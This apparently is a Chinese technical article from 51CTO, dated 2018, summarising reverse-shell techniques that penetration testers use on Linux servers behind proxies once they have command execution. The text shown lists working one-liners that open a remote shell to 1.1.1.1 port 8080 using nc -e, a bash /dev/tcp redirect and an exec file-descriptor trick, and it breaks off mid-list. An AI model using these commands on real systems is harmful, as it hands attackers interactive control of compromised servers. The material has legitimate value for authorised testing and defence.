|
|
51CTO旗下网站
|
|
移动端

Linux下内网反弹技巧总结和杂谈

靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。

作者:Double-S来源:合天智汇|2018-06-18 10:33

通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。

一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。

这里我整理了下之前实际使用过的反连手法,纯属总结。

反弹技巧总结

1、NC反弹

  1. Nc 1.1.1.1 8080 -e /bin/bash 

2、Bash-socket反弹

  1. /bin/bash -i > /dev/tcp/1.1.1.1/8080 0<&1 2>&1 

3、Shell-socket反弹

  1. a) exec 2>&0;0<&196;  
  2. exec 196<>/dev/tcp/1.1.1.1/8080;  
  3.  sh <&196 >&196 2>&196  
  4. b